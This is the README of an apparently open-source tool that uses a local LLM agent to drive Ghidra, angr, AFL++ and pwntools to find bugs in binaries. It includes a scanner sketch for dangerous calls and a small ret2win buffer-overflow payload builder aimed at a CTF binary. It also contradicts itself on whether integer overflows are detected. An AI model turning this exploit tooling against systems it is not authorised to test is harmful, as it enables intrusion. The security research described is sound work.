Local-first reverse engineering orchestrator. Drives Ghidra, angr, Frida, rizin, QEMU, AFL++ and pwntools through a small-model LLM loop to triage binaries, identify likely bugs, and persist structured findings.
No API keys. No network calls. Everything runs on your machine.
Given a binary target, Somnus:
- Runs fast triage (protections, imports, dangerous calls, function inventory).
- Decompiles every function with Ghidra (cached per target).
- Pattern-matches the decompiled C for classic bug signatures (stack BOF, format string, command injection, integer overflow).
- Lets a local LLM reason over the compacted preview and call follow-up tools (zoom into one function, check reachability, propose a PoC shape).
- Persists findings and artifacts to SQLite — resumable, queryable.
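The pattern-matching step can be pictured as a regex scan over decompiled C. The sketch below is only an illustration: the `SIGNATURES` table, the `Suspect` record, and `scan` are hypothetical names, not Somnus's actual rule set or API.

```python
import re
from dataclasses import dataclass

# Hypothetical signature table (call name -> bug class); not Somnus's real rules.
SIGNATURES = {
    "gets": "stack-bof",
    "strcpy": "stack-bof",
    "sprintf": "stack-bof",
    "system": "command-injection",
}

# Match a listed call name only when it starts at a word boundary,
# so that e.g. "fgets(" does not count as "gets(".
CALL_RE = re.compile(r"\b(" + "|".join(map(re.escape, SIGNATURES)) + r")\s*\(")


@dataclass(frozen=True)
class Suspect:
    function: str   # function the call was found in
    call: str       # the dangerous callee
    bug_class: str  # coarse label for the suspected bug
    line: int       # 1-based line inside the decompiled function


def scan(function_name: str, decompiled_c: str) -> list[Suspect]:
    """Return one Suspect per dangerous call found in the decompiled text."""
    hits = []
    for lineno, text in enumerate(decompiled_c.splitlines(), start=1):
        for match in CALL_RE.finditer(text):
            call = match.group(1)
            hits.append(Suspect(function_name, call, SIGNATURES[call], lineno))
    return hits


SAMPLE = """void pwnme(void) {
  char buf[32];
  gets(buf);
  system(buf);
}"""

for suspect in scan("pwnme", SAMPLE):
    print(suspect)
```

A purely textual scan like this only yields candidates, which is why its hits would need the later reachability and verification steps before being trusted.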
Working prototype. Verified end-to-end on ROP Emporium ret2win (x86_64): correctly identifies the read() overflow in pwnme, the ret2win gadget address, and computes the 40-byte overflow offset. Generalization beyond simple CTF stack-BOF challenges is not yet tested.
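To make the 40-byte offset concrete, here is a minimal sketch of the PoC shape it implies on x86_64: 40 bytes of padding followed by an 8-byte little-endian return address. `RET2WIN_ADDR` is a placeholder value, not the address Somnus reports, and the sketch uses only the standard library rather than pwntools.

```python
import struct

OFFSET = 40              # bytes from the start of the buffer to the saved return address
RET2WIN_ADDR = 0x401000  # placeholder only; substitute the address found in your binary


def build_payload(offset: int, target: int) -> bytes:
    """Pad up to the saved return address, then overwrite it with `target`."""
    padding = b"A" * offset
    # "<Q" packs an unsigned 64-bit integer in little-endian order (x86_64).
    return padding + struct.pack("<Q", target)


payload = build_payload(OFFSET, RET2WIN_ADDR)
print(len(payload), payload[-8:].hex())
```

An offset of 40 would be consistent with, for example, a 32-byte stack buffer followed by the 8-byte saved frame pointer, though the exact layout should be confirmed against the decompilation.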
- Python 3.11+
- Ollama for the local LLM (or any OpenAI-compatible server: llama.cpp, vLLM, LM Studio)
- A model with tool-use support (`qwen3:8b` is the recommended default)
- Ghidra 11+ with JDK 21 (required for decompilation)
- Optional: `rizin` on PATH (faster triage), QEMU (crash verification), AFL++ (fuzzing)
git clone https://github.com/AshtonVaughan/somnus.git
cd somnus
python -m venv .venv
# Windows:
.venv\Scripts\activate
# macOS/Linux:
source .venv/bin/activate
pip install -e ".[tui]"

Pull a local model:

ollama pull qwen3:8b

Point Somnus at Ghidra (once, permanent):
# Windows PowerShell
[System.Environment]::SetEnvironmentVariable("GHIDRA_INSTALL_DIR", "C:\tools\ghidra_12.0.4_PUBLIC", "User")
# macOS/Linux (add this line to ~/.bashrc or ~/.zshrc to make it permanent)
export GHIDRA_INSTALL_DIR="$HOME/tools/ghidra_12.0.4_PUBLIC"

# check which adapters are available
somnus adapters
# binary metadata
somnus info targets/mybinary
# run the full agent loop (CLI, streaming progress)
somnus hunt targets/mybinary --goal "Triage and identify any memory-safety bugs."
# run with the live TUI (three panes: transcript, findings, tool output)
somnus tui targets/mybinary
# list persisted findings
somnus findings targets/mybinary

# Ollama (default)
somnus hunt targets/bin --model qwen3:8b
somnus hunt targets/bin --model qwen3-coder:30b-a3b # if you have the VRAM
# llama.cpp / vLLM / LM Studio
somnus hunt targets/bin --provider openai \
--host http://localhost:8080/v1 \
--model my-local-model

Environment variables (see .env.example):
| Variable | Default | Purpose |
|---|---|---|
| `SOMNUS_LLM` | `ollama` | Backend: `ollama` or `openai` |
| `SOMNUS_OLLAMA_MODEL` | `qwen3:8b` | Ollama model tag |
| `OLLAMA_HOST` | `http://localhost:11434` | Ollama daemon URL |
| `SOMNUS_OPENAI_BASE` | `http://localhost:8080/v1` | OpenAI-compat server URL |
| `SOMNUS_THINK` | off | Set to `1` to enable Qwen3 thinking mode |
| `GHIDRA_INSTALL_DIR` | unset | Path to your Ghidra install |
target -> Triage (rizin, pwntools)
-> Decompile (Ghidra headless, cached)
-> Pattern matcher emits SUSPECTED findings
-> Agent loop:
LLM picks next tool
adapter runs, normalizes output
finding store updated
repeat until budget or goal met
-> Verifier (angr reachability / crash PoC)
-> Report
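The agent-loop stage of the pipeline above can be sketched as a budgeted loop. Everything here is an assumption made for illustration: `State`, `Finding`, `run_loop`, and the tool names are hypothetical, and a scripted policy stands in for the LLM.

```python
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class Finding:
    title: str
    status: str = "SUSPECTED"


@dataclass
class State:
    findings: list[Finding] = field(default_factory=list)
    transcript: list[str] = field(default_factory=list)


Tool = Callable[[State], list[Finding]]  # adapter call returning new findings
Policy = Callable[[State], "str | None"]  # tool name, or None once the goal is met


def run_loop(policy: Policy, tools: dict[str, Tool], state: State, budget: int) -> State:
    """Repeat pick-tool / run / update-store until the budget or goal is reached."""
    for step in range(budget):
        choice = policy(state)            # the LLM would pick the next tool here
        if choice is None:                # goal met: stop early
            break
        new = tools[choice](state)        # adapter runs and returns normalized findings
        state.findings.extend(new)        # finding store updated
        state.transcript.append(f"step {step}: {choice} -> {len(new)} finding(s)")
    return state


def scripted_policy(state: State) -> "str | None":
    """Stand-in for the LLM: follow a fixed two-step plan, then stop."""
    plan = ["zoom_function", "check_reachability"]
    done = len(state.transcript)
    return plan[done] if done < len(plan) else None


TOOLS: dict[str, Tool] = {
    "zoom_function": lambda s: [Finding("read() overflow in pwnme")],
    "check_reachability": lambda s: [],
}

final = run_loop(scripted_policy, TOOLS, State(), budget=8)
print("\n".join(final.transcript))
```

The hard step budget is what keeps a small model that loops or stalls from running indefinitely.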
See docs/architecture.md for full diagram and design principles.
| Adapter | Tool | Role |
|---|---|---|
| `rizin` | rizin / radare2 via r2pipe | triage |
| `pwntools` | pwntools ELF | protections + GOT/PLT |
| `ghidra` | Ghidra headless + post-script | decompilation + pattern matcher |
| `angr` | angr | CFG, symbolic reachability |
| `qemu` | QEMU user-mode | crash PoC verification |
| `frida` | Frida | runtime hooks |
| `aflpp` | AFL++ | coverage-guided fuzzing |
Every adapter returns (Artifact[], Finding[]). The LLM never sees raw tool output — only the normalized preview built by somnus/agent/preview.py.
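One way to picture this contract is shown below. The field names, the `Adapter` protocol, `EchoAdapter`, and the `preview` helper are all hypothetical. They only illustrate the "(Artifact[], Finding[]) in, compact preview out" idea and are not the contents of somnus/agent/preview.py.

```python
from dataclasses import dataclass
from typing import Protocol


@dataclass(frozen=True)
class Artifact:
    kind: str  # e.g. "decompilation"
    path: str  # where the raw tool output is stored


@dataclass(frozen=True)
class Finding:
    title: str
    function: str
    status: str  # e.g. "SUSPECTED"


class Adapter(Protocol):
    name: str

    def run(self, target: str) -> tuple[list[Artifact], list[Finding]]: ...


class EchoAdapter:
    """Toy adapter that returns one canned artifact and one canned finding."""

    name = "echo"

    def run(self, target: str) -> tuple[list[Artifact], list[Finding]]:
        artifacts = [Artifact("decompilation", f"{target}.c")]
        findings = [Finding("unbounded read into stack buffer", "pwnme", "SUSPECTED")]
        return artifacts, findings


def preview(artifacts: list[Artifact], findings: list[Finding], limit: int = 200) -> str:
    """Build the compact text the model sees instead of raw tool output."""
    lines = [f"[{f.status}] {f.function}: {f.title}" for f in findings]
    lines += [f"artifact {a.kind}: {a.path}" for a in artifacts]
    return "\n".join(lines)[:limit]  # hard cap keeps the prompt small


adapter: Adapter = EchoAdapter()
print(preview(*adapter.run("targets/mybinary")))
```

Capping the preview length is one plausible way to keep a small model's context from being flooded by verbose tool output.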
Local tool-use reliability is the bottleneck. Recommendations for a 2026 machine:
| VRAM / unified memory | Model |
|---|---|
| 6-8 GB | gemma4:e4b (4B, agent-trained) |
| 8-12 GB | qwen3:8b (default) |
| 16-24 GB | qwen3-coder:30b-a3b (MoE, 3B active, strong code reasoning) |
| 48 GB+ | qwen3-coder:next (80B-A3B) |
Sub-4B models emit malformed tool-call JSON and hallucinate function names; don't bother.
- Verified on one textbook CTF binary. Novel-bug discovery on real codebases is unproven.
- Pattern matcher catches `gets/fgets/strcpy/sprintf/read/printf(arg)/system(arg)`. No UAF, no integer overflow, no logic bugs.
- No runtime verification on Windows without WSL. Reachability via angr is the current gate.
- Stripped binaries degrade function identification. Name-based priority lists (`pwnme`, `ret2win`, etc.) only fire with symbols present.
- x86_64 is the primary target. ARM/MIPS work through Ghidra but address math and PoC shapes assume x86_64.
MIT. See LICENSE.
Issues and PRs welcome. Keep adapters small and self-contained — the orchestrator only cares about Artifact / Finding.